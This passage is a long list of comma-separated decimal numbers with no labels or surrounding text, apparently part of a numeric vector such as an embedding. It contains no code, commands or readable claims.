-0.03071143664419651, 0.012594242580235004, -0.007262839935719967, 0.03106260672211647, 0.026050448417663574, -0.0040185051038861275, -0.038596805185079575, 0.017925646156072617, -0.018436439335346222, -0.014429905451834202, 0.0020471629686653614, 0.04629062861204147, 0.005355346482247114, -0.022921841591596603, -0.02577909082174301, 0.005702526308596134, -0.0141745088621974, -0.031988419592380524, 0.008659539744257927, -0.001857610885053873, 0.03291423246264458, -0.000640985497739166, 0.019122818484902382, -0.02201199159026146, -0.012745884247124195, -0.0071351416409015656, 0.035372424870729446, -0.054271768778562546, -0.009920559823513031, -0.011812090873718262, 0.0342869870364666, 0.0032383485231548548, 0.02198006585240364, 0.028093621134757996, -0.03042411617934704, 0.026305845007300377, -0.020495574921369553, 0.03747944533824921, 0.026066411286592484, -0.030871059745550156, -0.004389628302305937, 0.034733932465314865, 0.03840525820851326, 0.016664626076817513, -0.027407243847846985, -0.012769828550517559, -0.003146565519273281, -0.025012901052832603, -0.016505002975463867, 0.008228558115661144, -0.03594706580042839, -0.014358075335621834, 0.005910036154091358, -0.009569389745593071, 0.0002563942107371986, 0.004457468166947365, -0.028045734390616417, -0.01846836321055889, -0.001787775894626975, -0.008156727999448776, 0.04351319000124931, -0.00786940660327673, -0.005159808788448572, -0.011133694089949131, -0.006436791270971298, -0.00035141967236995697, 0.013990943320095539, -0.01715945638716221, 0.02055942267179489, 0.015132246538996696, 0.011652467772364616, 0.025683317333459854, 0.0048006572760641575, -0.005546893924474716, 0.00871540792286396, -0.0010624895803630352, -0.0015892450464889407, -0.015092340297996998, -0.011955751106142998, 0.04447092488408089, 0.0015243982197716832, -0.005107931327074766, -0.007570113521069288, 0.013543998822569847, -0.005091968923807144, 0.010798485949635506, 0.013751508668065071, 0.02407112531363964, -0.0192345529794693, -0.038532957434654236, 0.0439920574426651, 0.003904774086549878, 0.022155651822686195, -0.008651558309793472, 0.006791952531784773, -0.008523860014975071, -0.01101397629827261, 0.026002561673521996, -0.008531841449439526, -0.0053752996027469635, 0.010191919282078743, 0.03291423246264458, -0.0027834235224872828, 0.010263749398291111, 0.001848632120527327, 0.006245243828743696, -0.012650110758841038, 0.02863634005188942, -0.018037382513284683, -0.0014286244986578822, -0.010471259243786335, 0.003968623001128435, 0.0010974070755764842, -0.0003693772596307099, 0.004692911636084318, -0.025603504851460457, -0.01642519049346447, 0.0006883735186420381, -0.02938656695187092, -0.014836943708360195, 0.010471259243786335, 0.0024781448300927877, -0.01741485297679901, -0.021054254844784737, -0.026353733614087105, -0.006376932840794325, 0.013224753551185131, -0.02447018399834633, 0.04434322938323021, -0.03074336051940918, 0.01447779219597578, -0.010096145793795586, 0.0049562896601855755, 0.011692374013364315, 0.023879578337073326, -0.016145851463079453, 0.0006923641194589436, -0.006775990128517151, 0.03111049346625805, 0.004497373942285776, 0.0016381294699385762, 0.05784732103347778, 0.018372589722275734, -0.01746273972094059, 0.0039207362569868565, -0.0122111476957798, -0.020527498796582222, 0.00037735840305685997, -0.012953394092619419, -0.0022027953527867794, -0.04057613015174866, -0.027694564312696457, 0.015236001461744308, 0.009401786141097546, 0.046577949076890945, 0.003505716798827052, 0.00944169145077467, -0.0153876431286335, 0.0034837687853723764, -0.026273921132087708, -0.008691464550793171, -0.015180133283138275, 0.03104664385318756, -0.02095847949385643, 0.011205524206161499, -0.022171614691615105, -0.0036314199678599834, -0.013240715488791466, 0.041725412011146545, 0.0014805019600316882, -0.006356980185955763, 0.0006165432860143483, 0.0032822447828948498, 0.011548712849617004, -0.012163260951638222, 0.021549085155129433, -0.023847654461860657, 0.036138612776994705, -0.02308146469295025, 0.022570671513676643, -0.019442062824964523, 0.01782987266778946, 0.0071511035785079, -0.0011722303461283445, -0.0226664450019598, -0.024980975314974785, 0.008635596372187138, -0.005399242974817753, 0.024502107873558998, -0.004649015609174967, 0.01709560677409172, 0.005646658129990101, 0.01749466359615326, 0.013863245025277138, 0.0336165726184845, -0.006169422995299101, -0.005451120436191559, 0.00122111476957798, 0.027742451056838036, 0.022203538566827774, 0.006113555282354355, 0.022490859031677246, 0.011668430641293526, -0.0005881104152649641, 0.00244222953915596, 0.0014745161170139909, -0.0029530227184295654, -0.013057149015367031, -0.036872878670692444, 0.0006754042115062475, 0.010766561143100262, 0.013743527233600616, -0.00671613123267889, -0.010359522886574268, 0.003743155859410763, 0.009393804706633091, -0.03866065293550491, 0.004333760589361191, 0.005415205378085375, -0.02273029461503029, 0.023815728724002838, 0.01781390979886055, 0.0057783471420407295, 0.01889934577047825, 0.019984781742095947, 0.0030208623502403498, -0.02274625562131405, 0.034414686262607574, -0.037894465029239655, 0.02790207415819168, 0.011724298819899559, 0.04073575139045715, 0.0067041595466434956, -0.01592237874865532, 0.0028233290649950504, 0.0002636271237861365, -0.003148560645058751, 0.009633239358663559, -0.021165989339351654, -0.010774542577564716, 0.00017882748215924948, 0.008795219473540783, 0.0047687324695289135, -0.0018905331380665302, 0.025539657101035118, -0.013304565101861954, 0.03168513625860214, -0.01202758215367794, 0.009130426682531834, 0.021038291975855827, -0.03206823021173477, 0.01083839125931263, -0.02129368856549263, 0.01187594048678875, -0.013512074016034603, 0.0059539321810007095, 0.005267553962767124, -0.01886742189526558, -0.008779256604611874, 0.01988900639116764, -0.02403920143842697, -0.024262674152851105, -0.004980233032256365, 0.005303469020873308, 0.012857620604336262, -0.03342502564191818, -0.003809000365436077, 0.007406500168144703, 0.022235462442040443, -0.01414258498698473, -0.0023045549169182777, -0.004760751500725746, 0.00839616172015667, -0.003904774086549878, 0.05098353698849678, -0.03171706199645996, -0.012123355641961098, 0.029450416564941406, -0.03066354990005493, 0.03179687261581421, -0.020367875695228577, -0.0029091264586895704, -0.01644115336239338, -0.0045891571789979935, -0.0017817900516092777, 0.008986766450107098, -0.001247053500264883, -0.020719045773148537, 0.013160903938114643, -0.02935464307665825, -0.025715241208672523, -0.004084349609911442, 0.0015024500899016857, -0.037543293088674545, 0.011109750717878342, 0.00531943142414093, 0.028333056718111038, -0.00943371094763279, 0.026736827567219734, -0.005467082839459181, -0.03326540067791939, 0.02654528059065342, 0.010886278003454208, 0.0024362436961382627, 0.0030667539685964584, -0.0013966999249532819, 0.00993652269244194, 0.0042978450655937195, -0.010527127422392368, 0.014621453359723091, 0.016935983672738075, -0.020064592361450195, 0.012099412269890308, 0.024166898801922798, -0.009816804900765419, 0.0076100192964077, -0.014485773630440235, -0.01519609522074461, 0.021181952208280563, -0.02999313361942768, 0.014661358669400215, 0.015587171539664268, -0.016329417005181313, 0.003741160500794649, 0.026800677180290222, 0.0046450248919427395, -0.010367504321038723, -0.013312545605003834, 0.014006905257701874, 0.014964642003178596, -0.010575014166533947, -0.04536481574177742, -0.022283349186182022, 0.0030148765072226524, -0.015730831772089005, 0.0032463297247886658, -0.03342502564191818, -0.018787609413266182, 0.03348887339234352, 0.004912393167614937, -0.014852906577289104, 0.011923827230930328, 0.013559960760176182, 0.019761309027671814, 0.02410305105149746, 0.0213256124407053, 0.014597509987652302, -0.015140227042138577, 0.02204391546547413, 0.02411901205778122, 0.012330865487456322, 0.0020072574261575937, -0.029067320749163628, -0.012650110758841038, -0.00734664173796773, -0.005303469020873308, -0.00037710898322984576, 0.017893722280859947, 0.006436791270971298, -0.017670249566435814, -0.005662620533257723, 0.004194090608507395, 0.0046091098338365555, -0.008523860014975071, 0.017255229875445366, 0.011468902230262756, 0.032674796879291534, -0.02126176469027996, 0.010247787460684776, 0.02336878515779972, -0.023672068491578102, 0.01081444788724184, -0.009912579320371151, -0.008906954899430275, -0.010750599205493927, -0.012650110758841038, -0.005646658129990101, -0.027327431365847588, -0.03601091355085373, 0.0021988048683851957, 0.027997847646474838, -0.014286245219409466, 0.004517326597124338, -0.043098170310258865, -0.00697551853954792, 0.0017508631572127342, -0.02234719879925251, -0.0027914047241210938, -0.022235462442040443, 0.011317260563373566, -0.00778161408379674, 0.027455130591988564, -0.013504093512892723, -0.012769828550517559, -0.031924571841955185, -0.006241253577172756, -0.011061863973736763, -0.004980233032256365, -0.014621453359723091, -0.01674443669617176, -0.013855263590812683, -0.03257902339100838, -0.0012350818142294884, 0.01917070522904396, 0.036840952932834625, -0.0009138408349826932, 0.029594076797366142, -0.021788518875837326, 0.023608218878507614, -0.01099003292620182, -0.014653378166258335, -0.0028572489973157644, 0.0028911689296364784, -0.021469272673130035, 0.0014316174201667309, 0.0002840787929017097, -0.029179057106375694, -0.011428995989263058, 0.0021768566220998764, 0.011484864167869091, -0.010894259437918663, -0.01619373820722103, 0.010790504515171051, -0.019713422283530235, -0.024246711283922195, -0.00993652269244194, 0.009481597691774368, 0.0523562952876091, -0.03457431122660637, 0.011277354322373867, 0.01031163614243269, 0.04303431883454323, -0.0032223863527178764, -0.01741485297679901, 0.01846836321055889, -0.022458935156464577, -0.0067001692950725555, 0.01627354882657528, 0.009689106605947018, -0.014038830064237118, -0.017670249566435814, -0.02507675066590309, -0.010399429127573967, -0.0033680421765893698, -0.011229467578232288, -0.01889934577047825, -0.014557603746652603, 0.004110288340598345, 0.008787238039076328, 0.019266478717327118, 0.01889934577047825, -0.023528408259153366, 0.006097592879086733, 0.009114464744925499, 0.0012580276234075427, 0.009258124977350235, 0.015666982159018517, 0.001159260980784893, 0.01779794879257679, 0.01679232344031334, 0.019394176080822945, 0.02972177416086197, -0.028029773384332657, -0.0060936021618545055, -0.005678582936525345, -0.010966089554131031, 0.0037810662761330605, 0.021453311666846275, -0.023624181747436523, 0.020048629492521286, -0.0046250722371041775, -0.01671251282095909, 0.01950591243803501, -0.013807376846671104, 0.0009038643911480904, 0.020798858255147934, -0.013751508668065071, 0.02965792641043663, -0.05839003995060921, -0.010694731026887894, -0.03447853401303291, -0.004736808128654957, -0.011564675718545914, -0.02065519616007805, -0.028444791212677956, -0.004265920724719763, 0.016161814332008362, 0.023129351437091827, 0.023672068491578102, 0.02727954462170601, 0.0034458583686500788, 0.019617648795247078, -0.022442972287535667, -0.022602595388889313, -0.04705681651830673, -0.010279711335897446, -0.009665163233876228, 0.0064208293333649635, -0.0059180171228945255, 0.025587543845176697, -0.014749151654541492, 0.027694564312696457, 0.02065519616007805, -0.00005424682967714034, 0.010167975910007954, -0.03553204610943794, 0.015036472119390965, -0.03840525820851326, -0.011165618896484375, 0.015810644254088402, 0.03307385370135307, -0.028173433616757393, 0.008467991836369038, 0.005107931327074766, 0.01743081584572792, -0.012362789362668991, -0.010918202809989452, 0.01779794879257679, -0.013232734054327011, 0.010870316065847874, -0.0092421630397439, 0.009202257730066776, -0.03463815897703171, -0.0336165726184845, 0.021118102595210075, 0.033999666571617126, 0.0037990238051861525, -0.017590438947081566, -0.014765113592147827, -0.008659539744257927, 0.007805557455867529, 0.004585166461765766, 0.002815348096191883, -0.014342113398015499, -0.0369686521589756, 0.011173599399626255, -0.007099226117134094, 0.04479017108678818, -0.015914399176836014, -0.014286245219409466, 0.0009826781461015344, -0.026704903692007065, -0.027407243847846985, 0.016002191230654716, -0.00891493633389473, -0.0027056073304265738, 0.0009996381122618914, -0.012322884052991867, -0.044151682406663895, -0.027758413925766945, -0.012267015874385834, 0.007542179897427559, 0.0008080906700342894, 0.01275386568158865, -0.007426453288644552, -0.0067879618145525455, 0.004525308031588793, 0.00679993350058794, -0.0226664450019598, 0.007905322127044201, -0.01620970107614994, 0.014573566615581512, -0.010998014360666275, -0.03149358928203583, 0.0022646491415798664, -0.0029769660905003548, 0.007769642397761345, -0.010511164553463459, -0.012817715294659138, -0.03482970595359802, 0.002432253211736679, -0.005826233886182308, 0.018244892358779907, 0.011692374013364315, -0.0030388201121240854, -0.0031924571376293898, -0.0017049715388566256, -0.027694564312696457, -0.0028013810515403748, -0.01083041075617075, -0.0014435891062021255, 0.006468716077506542, 0.11128905415534973, -0.008096869103610516, -0.007993114180862904, 0.0061774044297635555, 0.0033720326609909534, -0.0052555822767317295, 0.04335356503725052, -0.002998914336785674, 0.018085269257426262, 0.013472168706357479, 0.036521706730127335, 0.0049562896601855755, 0.0008060953696258366, -0.0009263113606721163, 0.004964270628988743, 0.01958572305738926, -0.018723759800195694, 0.012530393898487091, 0.007985132746398449, 0.019713422283530235, -0.007905322127044201, 0.003364051692187786, -0.0016321436269208789, -0.002302559558302164, -0.010159994475543499, -0.0008918927051126957, 0.003916745539754629, -0.013719583861529827, -0.01921859197318554, -0.014988585375249386, -0.009385823272168636, -0.03425506502389908, -0.0009058596915565431, -0.0265133548527956, 0.015435529872775078, 0.021852368488907814, 0.0025918760802596807, -0.013919112272560596, 0.0009582359343767166, -0.031557437032461166, 0.008531841449439526, 0.012418657541275024, -0.019777271896600723, 0.035372424870729446, -0.007861425168812275, -0.00007862672646297142, -0.010774542577564716, -0.0011083811987191439, -0.0042778924107551575, 0.019761309027671814, -0.0033361176028847694, -0.03238747641444206, 0.011987675912678242, 0.014980604872107506, 0.002693635644391179, 0.018308740109205246, 0.0027076026890426874, -0.0011742255883291364, 0.014158546924591064, -0.009042634628713131, -0.01063886284828186, 0.0057623847387731075, 0.007358613424003124, 0.006640310399234295, -0.0061813946813344955, -0.019362252205610275, -0.01715945638716221, -0.003587523475289345, -0.032978080213069916, 0.012155280448496342, 0.024581918492913246, -0.010854354128241539, -0.0050121573731303215, -0.0017319079488515854, 0.000208133234991692, 0.01816507987678051, -0.0002995422692038119, 0.0008345282403752208, -0.0060058096423745155, -0.006576461251825094, -0.0134242819622159, 0.030519889667630196, -0.03326540067791939, -0.0014675325946882367, -0.009210238233208656, 0.027838224545121193, -0.03109453059732914, -0.007027396000921726, 0.026960300281643867, -0.010918202809989452, 0.010910222306847572, 0.01671251282095909, 0.016888096928596497, 0.035819366574287415, -0.001875568530522287, 0.017398890107870102, 0.011676411144435406, -0.01153275091201067, -0.015970265492796898, -0.0018426462775096297, -0.0007197993109002709, 0.0020890641026198864, 0.035053178668022156, 0.009729012846946716, 0.0008599681314080954, 0.0065086218528449535, 0.027119921520352364, 0.013168885372579098, -0.00723490584641695, -0.001639127149246633, -0.028540566563606262, 0.0024561965838074684, 0.009840749204158783, -0.001865592086687684, -0.007282792590558529, -0.00019715915550477803, 0.018691835924983025, -0.0014805019600316882, 0.014214415103197098, -0.0076738684438169, -0.033999666571617126, -0.028780000284314156, 0.013472168706357479, -0.014661358669400215, 0.03971416503190994, -0.010351541452109814, -0.003964632749557495, -0.02410305105149746, 0.026369694620370865, 0.02239508554339409, 0.0045731947757303715, 0.0026657015550881624, 0.015467454679310322, 0.017670249566435814, 0.0069116693921387196, 0.010247787460684776, 0.010590976104140282, 0.030120832845568657, -0.011548712849617004, 0.011277354322373867, -0.03316962718963623, 0.0356278195977211, -0.006133507937192917, -0.009744974784553051, -0.004529298283159733, -0.016632700338959694, -0.008819162845611572, 0.017015796154737473, 0.0046091098338365555, -0.011397071182727814, 0.022107765078544617, -0.02656124159693718, 0.026657016947865486, -0.0028791972436010838, -0.0064567443914711475, -0.009744974784553051, 0.007753679994493723, -0.003505716798827052, -0.01883549615740776, 0.002091059461236, 0.031286079436540604, 0.007019415032118559, -0.005714497994631529, 0.019410138949751854, -0.002041177125647664, 0.013615828938782215, -0.021453311666846275, -0.047599535435438156, -0.02129368856549263, 0.0029929284937679768, -0.0017807924887165427, -0.004389628302305937, -0.005091968923807144, 0.0049403272569179535, 0.017207343131303787, -0.0056546395644545555, 0.003042810596525669, -0.008420105092227459, 0.05143048241734505, -0.01431817002594471, -0.01099003292620182, 0.00470887403935194, -0.02194814197719097, 0.006081630475819111, 0.017526589334011078, 0.021022329106926918, 0.000967713538557291, 0.020671159029006958, -0.031222229823470116, 0.012674054130911827, -0.011867959052324295, 0.059188153594732285, -0.0192345529794693, 0.0195697620511055, 0.018915308639407158, -0.0018625991651788354, -0.015283888205885887, 0.008076916448771954, 0.008531841449439526, -0.015355718322098255, 0.010734636336565018, -0.00406439695507288, -0.0006938605802133679, -0.0058980644680559635, 0.0019134789472445846, -0.034765858203172684, -0.00723889609798789, -0.03987378999590874, -0.00909052137285471, -0.0022207528818398714, -0.004084349609911442, -0.013559960760176182, -0.004704883322119713, 0.00040254887426272035, 0.03237151354551315, -0.0015593157149851322, -0.010255767963826656, -0.033712346106767654, 0.006484678480774164, -0.019793232902884483, 0.0006978511810302734, 0.011923827230930328, 0.00041452058940194547, -0.03304193168878555, 0.028189394623041153, 0.023863615468144417, 0.016050077974796295, -0.03184475749731064, 0.016999833285808563, 0.008707426488399506, -0.005155818071216345, -0.006436791270971298, -0.00837221834808588, 0.00020364383817650378, 0.00031475629657506943, -0.015283888205885887, 0.027056073769927025, 0.0062332721427083015, -0.007510255090892315, -0.00024978481815196574, 0.013966999016702175, -0.014374038204550743, -0.007302745245397091, -0.009641219861805439, -0.0010275720851495862, -0.00012302183313295245, 0.02196410484611988, -0.0016331413062289357, -0.021389462053775787, 0.007649925071746111, 0.0030128813814371824, -0.008635596372187138, 0.006971527822315693, -0.00871540792286396, -0.0044335247948765755, 0.012626167386770248, -0.012043544091284275, 0.020128441974520683, -0.010088164359331131, -0.0058980644680559635, 0.009361879900097847, -0.004142213147133589, 0.014062773436307907, 0.017351003363728523, -0.009449672885239124, 0.02308146469295025, -0.010966089554131031, -0.004565213341265917, 0.01307311188429594, -0.019346289336681366, 0.01521205808967352, 0.014086716808378696, 0.017366966232657433, -0.005910036154091358, -0.018723759800195694, -0.0022466916125267744, 0.003818976692855358, -0.01988900639116764, 0.005702526308596134, -0.019458025693893433, -0.015180133283138275, 0.054686788469552994, 0.01521205808967352, -0.03415929153561592, 0.021357538178563118, -0.04852534830570221, -0.03146166354417801, -0.02758282795548439, -0.010455296374857426, 0.020415762439370155, -0.0032583014108240604, -0.020766932517290115, -0.0042619300074875355, -0.02411901205778122, -0.011413034051656723, 0.029945246875286102, 0.0053393845446407795, 0.026672977954149246, -0.019282439723610878, 0.004561223089694977, 0.009465634822845459, 0.012099412269890308, 0.004028481896966696, 0.019043006002902985, -0.029562152922153473, -0.005487035494297743, 0.007789595052599907, -0.03802216425538063, 0.013751508668065071, 0.020431725308299065, -0.0024482153821736574, -0.026034487411379814, 0.006971527822315693, 0.005295488052070141, -0.013639772310853004, 0.008068935014307499, 0.020495574921369553, -0.006835848558694124, -0.012458563782274723, 0.005227648187428713, 0.010694731026887894, -0.023640144616365433, -0.03591514006257057, -0.01556322816759348, 0.0063011120073497295, -0.021405424922704697, -0.00152539589907974, -0.011899883858859539, 0.0026836590841412544, -0.022602595388889313, 0.01712753251194954, 0.00354362721554935, 0.004561223089694977, -0.007167065981775522, -0.010223843157291412, -0.04351319000124931, 0.01533975638449192, -0.004150194115936756, -0.028476716950535774, 0.012737903743982315, -0.040991149842739105, 0.016840210184454918, -0.0056187245063483715, 0.0035516084171831608, 0.0050121573731303215, -0.006221300456672907, -0.0034159289207309484, 0.01751062646508217, -0.011253410950303078, -0.013863245025277138, -0.019681498408317566, 0.013057149015367031, 0.020830782130360603, 0.020160365849733353, 0.023911502212285995, -0.005267553962767124, -0.02619411051273346, 0.03668133169412613, 0.0021070216316729784, -0.0036314199678599834, -0.023991314694285393, 0.00732269836589694, -0.013783433474600315, 0.020687121897935867, 0.005718488711863756, -0.011620543897151947, -0.0059499419294297695, 0.028045734390616417, 0.01850028894841671, 0.003699259599670768, -0.013144942000508308, -0.017909683287143707, -0.004509345628321171, 0.02127772569656372, -0.02515656128525734, 0.01627354882657528, 0.005475063808262348, -0.01987304538488388, 0.0038668636698275805, 0.006297121290117502, -0.03795831277966499, -0.045588284730911255, 0.0011353174922987819, 0.024677691981196404, -0.0030487964395433664, 0.006484678480774164, -0.0005716493469662964, -0.0056386771611869335, -0.013192828744649887, -0.02932271733880043, 0.015355718322098255, 0.0023943427950143814, 0.0009771911427378654, 0.0371282733976841, 0.010167975910007954, 0.0545271672308445, 0.0004753768153022975, -0.002015238394960761, -0.023640144616365433, -0.00063200673321262, 0.03419121354818344, -0.019442062824964523, -0.008244520053267479, 0.008356256410479546, -0.002623800653964281, 0.0013188838493078947, -0.009202257730066776, -0.01115763746201992, 0.03760714456439018, -0.022490859031677246, 0.03342502564191818, 0.0047687324695289135, -0.002372394548729062, 0.007023405283689499, -0.01185199711471796, 0.021022329106926918, 0.004964270628988743, 0.021150028333067894, 0.0026457486674189568, -0.016337398439645767, 0.006392895244061947, -0.005471073091030121, -0.01992093212902546, -0.016489040106534958, 0.014956661500036716, -0.022123727947473526, -0.0036294246092438698, -0.01743081584572792, -0.018963195383548737, -0.010766561143100262, -0.008168699219822884, -0.011716317385435104, 0.007594057358801365, 0.026768751442432404, 0.02961003966629505, 0.02062327228486538, 0.0019563776440918446, -0.0020631253719329834, -0.015954304486513138, 0.004006533417850733, 0.0041222600266337395, -0.005052063148468733, -0.022570671513676643, 0.014038830064237118, -0.019649572670459747, -0.024326521903276443, -0.0025838948786258698, 0.011740260757505894, -0.0063889045268297195, -0.011117731221020222, 0.015140227042138577, 0.0009123443742282689, 0.02866826392710209, 0.009872673079371452, 0.004720845725387335, 0.015914399176836014, -0.00038184778532013297, 0.010758579708635807, -0.0036493774969130754, 0.037830617278814316, -0.015826605260372162, -0.0035975000355392694, 0.01955379918217659, 0.004002543166279793, 0.0027574847918003798, 0.01886742189526558, 0.0005462094559334219, -0.0022167623974382877, -0.008100859820842743, -0.016177775338292122, 0.014358075335621834, -0.012793771922588348, 0.013998923823237419, -0.008954841643571854, 0.02973773702979088, -0.0041541848331689835, -0.004585166461765766, -0.014030848629772663, 0.0005327412509359419, -0.01671251282095909, -0.0055349222384393215, 0.008787238039076328, -0.010255767963826656, 0.0045372797176241875, -0.01711156964302063, 0.022842029109597206, 0.0048525347374379635, 0.0026198099367320538, 0.0017408867133781314, 0.02865230105817318, 0.029897360131144524, 0.004900421481579542, 0.0018965189810842276, 0.024374408647418022, 0.007438424974679947, 0.009186294861137867, 0.003382009221240878, -0.0028732114005833864, 0.020335951820015907, -0.0144698116928339, -0.02092655561864376, -0.015307831577956676, 0.0059539321810007095, -0.000007988936886249576, 0.008683483116328716, 0.03393581882119179, -0.01587449200451374, 0.020878668874502182, 0.0054630921222269535, -0.009058596566319466, -0.0030727398116141558, -0.00005044331555836834, -0.009058596566319466, 0.007099226117134094, -0.009561409242451191, -0.015603133477270603, -0.007941236719489098, -0.007809548173099756, 0.02439037151634693, -0.01308109238743782, 0.015587171539664268, 0.01415056549012661, 0.010590976104140282, -0.020719045773148537, -0.0008070930489338934, 0.021533122286200523, 0.01915474236011505, 0.005977875553071499, -0.020399799570441246, -0.014964642003178596, -0.003735174657776952, -0.00033745268592610955, -0.006065668538212776, -0.029482340440154076, -0.006217310205101967, -0.007801566738635302, 0.0038169813342392445, -0.0054271770641207695, 0.008467991836369038, -0.013001280836760998, 0.005981866270303726, -0.004309816751629114, 0.005774356424808502, 0.03738367184996605, -0.0060217720456421375, -0.00470887403935194, -0.00044469928252510726, -0.007733727339655161, -0.00793724600225687, -0.0020731016993522644, 0.007562132552266121, -0.018659912049770355, 0.0041382224299013615, -0.0012081454042345285, -0.006608386058360338, -0.0010475249728187919, -0.02126176469027996, -0.018931269645690918, -0.016473079100251198, -0.0016790328081697226, 0.002144932048395276, 0.001072466024197638, 0.020862706005573273, -0.016872135922312737, 0.008683483116328716, -0.008052973076701164, -0.003793037962168455, -0.012043544091284275, 0.010104126296937466, -0.011836034245789051, 0.0041222600266337395, -0.0041741374880075455, 0.0028372961096465588, 0.0019304389134049416, -0.011053882539272308, 0.0045053549110889435, 0.017718136310577393, -0.011492845602333546, 0.0244222953915596, -0.007773632649332285, 0.01185997761785984, -0.0037291888147592545, -0.018404515460133553, 0.0046250722371041775, -0.024565957486629486, -0.0029689851216971874, 0.014916755259037018, 0.02022421546280384, -0.014278263784945011, 0.0047807046212255955, 0.00235443701967597, 0.03104664385318756, -0.003569565946236253, 0.006348998751491308, -0.006297121290117502, -0.008819162845611572, -0.030168719589710236, -0.010678769089281559, -0.003846910782158375, -0.002111012116074562, 0.009106483310461044, 0.010024314746260643, 0.006261206232011318, -0.0017728112870827317, -0.011524769477546215, -0.003725198330357671, 0.0050281197763979435, -0.014637415297329426, -0.017526589334011078, -0.015962285920977592, -0.016161814332008362, 0.001385725918225944, 0.009665163233876228, -0.009633239358663559, -0.010072201490402222, -0.02062327228486538, -0.016313455998897552, -0.018085269257426262, -0.017271192744374275, -0.007841472513973713, 0.0021150028333067894, -0.023464558646082878, -0.000177705122041516, 0.0020890641026198864, 0.014198452234268188, -0.007270820904523134, -0.006217310205101967, -0.021150028333067894, -0.009984409436583519, -0.007749689277261496, -0.0068438295274972916, -0.0015134242130443454, -0.00856376625597477, 0.02515656128525734, -0.003391985548660159, 0.02480539120733738, -0.0134242819622159, -0.018069306388497353, -0.0003633913875091821, -0.008048982359468937, 0.0011552703799679875, -0.005574828013777733, -0.003882825840264559, -0.020479612052440643, -0.012458563782274723, 0.009050616063177586, 0.0032463297247886658, 0.007486311718821526, -0.01679232344031334, 0.022570671513676643, 0.025539657101035118, 0.00822057668119669, -0.008731369860470295, 0.008428086526691914, 0.01781390979886055, 0.0023225124459713697, -0.003990571480244398, 0.0024043191224336624, 0.015651021152734756, -0.0042938548140227795, 0.014701264910399914, 0.007342651020735502, 0.005263563711196184, 0.018947232514619827, 0.008340293541550636, -0.0003354573855176568, 0.02443825826048851, 0.03565974533557892, 0.027854187414050102, 0.019458025693893433, -0.009800842963159084, 0.01552332192659378, -0.005467082839459181, 0.0035815376322716475, 0.0005871127941645682, -0.014813000336289406, -0.015643039718270302, -0.011923827230930328, -0.007789595052599907, -0.003495740471407771, -0.012394714169204235, 0.005546893924474716, 0.0024342485703527927, -0.009569389745593071, -0.009425729513168335, -0.007091245148330927, 0.013935075141489506, -0.013033205643296242, 0.01677636243402958, 0.016281530261039734, -0.0031944522634148598, 0.015698907896876335, -0.015116283670067787, -0.012043544091284275, 0.007598047610372305, -0.02194814197719097, -0.019649572670459747, 0.00287720188498497, -0.0015653015580028296, 0.002947036875411868, 0.012697997502982616, 0.00671613123267889, -0.0020890641026198864, 0.00008903961861506104, 0.000575639889575541, 0.003645386779680848, 0.004641034174710512, 0.011173599399626255, -0.01063088234513998, 0.0062492345459759235, 0.01620970107614994, 0.007721755653619766, 0.01377545204013586, 0.008875030092895031, -0.009976428002119064, 0.007510255090892315, -0.02268240787088871, -0.015882473438978195, 0.014709245413541794, 0.005590790417045355, -0.007841472513973713, 0.000006262546776270028, 0.00837221834808588, 0.0062492345459759235, -0.012011619284749031, -0.0018007452599704266, -0.018276816233992577, -0.016632700338959694, -0.011213505640625954, 0.0074663590639829636, 0.006636320147663355, 0.029226943850517273, 0.015930360183119774, 0.0017309102695435286, -0.000015058170902193524, -0.014453848823904991, 0.017398890107870102, -0.002162889577448368, -0.012458563782274723, 0.014166528359055519, 0.016888096928596497, 0.0006055691628716886, -0.0023404699750244617, -0.003830948378890753, 0.0023923474363982677, 0.0042619300074875355, 0.0030448059551417828, -0.013671697117388248, -0.014852906577289104, 0.004166156519204378, -0.010144032537937164, 0.001995285740122199, 0.000022337846530717798, 0.0059858569875359535, 0.007131150923669338, 0.0012131336843594909, -0.01554726529866457, 0.019841119647026062, 0.0013587895082309842, -0.0006958558806218207, 0.0046250722371041775, 0.0011263387277722359, -0.0031784900929778814, 0.004668968264013529, 0.00009140902693616226, -0.01846836321055889, -0.005471073091030121, -0.0025679327081888914, 0.02239508554339409, 0.004688921384513378, 0.000571150507312268, -0.022937804460525513, 0.013464187271893024, -0.01397498045116663, -0.005922007840126753, 0.0009447677293792367, 0.00872338842600584, -0.012163260951638222, 0.003076730528846383, -0.01046327780932188, 0.023209162056446075, 0.016345379874110222, -0.018356628715991974, -0.000031550454878015444, 0.02753494121134281, -0.013368413783609867, -0.02790207415819168, 0.0020012715831398964, -0.0043457322753965855, -0.020080555230379105, -0.01187594048678875, 0.00776166096329689, -0.016321437433362007, -0.004964270628988743, 0.0010694731026887894, 0.0022247435990720987, -0.02411901205778122, 0.0031705088913440704, 0.018915308639407158, -0.022522784769535065, 0.0020282077603042126, -0.026449507102370262, -0.0033161647152155638, -0.017223306000232697, 0.016568852588534355, -0.001699983375146985, 0.005766375456005335, -0.006636320147663355, 0.019362252205610275, -0.008970804512500763, 0.00015413582150358707, 0.0035256696864962578, -0.014014886692166328, 0.015714868903160095, -0.022075841203331947, -0.007071292493492365, -0.0037032500840723515, 0.013328508473932743, 0.030615663155913353, 0.007849453948438168, 0.018963195383548737, -0.014038830064237118, 0.002807366894558072, -0.013703621923923492, 0.007043358404189348, -0.017670249566435814, 0.0014485773863270879, -0.015619096346199512, 0.016824249178171158, -0.021517159417271614, -0.008152737282216549, -0.005906045436859131, -0.03518087789416313, 0.003443863010033965, -0.004214043263345957, 0.00043048287625424564, -0.012187204323709011, 0.012354808859527111, -0.00488046882674098, 0.01925051584839821, -0.014134603552520275, 0.0042100525461137295, 0.02099040523171425, 0.004413571674376726, 0.02683260105550289, -0.0005028119776397943, 0.004022495821118355, -0.0035536037757992744, -0.012131337076425552, -0.00627716863527894, 0.011764204129576683, -0.008843106217682362, -0.008364237844944, 0.009290049783885479, -0.01414258498698473, 0.006341017782688141, 0.00019840621098410338, -0.033999666571617126, -0.011660449206829071, -0.021549085155129433, 0.010439334437251091, 0.011836034245789051, 0.002328498288989067, -0.007270820904523134, -0.015092340297996998, -0.00026986238663084805, -0.015108303166925907, -0.018085269257426262, -0.022171614691615105, 0.010215862654149532, -0.022826068103313446, 0.0032503202091902494, 0.004333760589361191, -0.004082354251295328, 0.024949051439762115, -0.010072201490402222, 0.0026257960125803947, -0.013496112078428268, -0.040639977902173996, 0.0029969189781695604, 0.020096516236662865, 0.008970804512500763, 0.003583532990887761, -0.009146389551460743, -0.002256668172776699, -0.013152922503650188, 0.005702526308596134, 0.008420105092227459, -0.02542792074382305, 